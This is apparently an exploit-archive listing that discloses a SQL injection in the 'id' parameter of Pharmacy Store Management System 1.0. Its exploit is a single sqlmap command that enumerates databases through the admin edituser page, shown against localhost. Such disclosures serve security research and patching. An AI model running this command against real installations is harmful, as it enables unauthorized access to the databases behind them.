Pharmacy Store Management System 1.0 SQL Injection

Pharmacy Store Management System version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | 46f89cdd676d680662acbdbe754a5280

# Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection
# Google Dork: N/A
# Date: 1.12.2020
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13225&title=Pharmacy+Store+Management+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux

Use SQLMAP:

sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch

Related Posts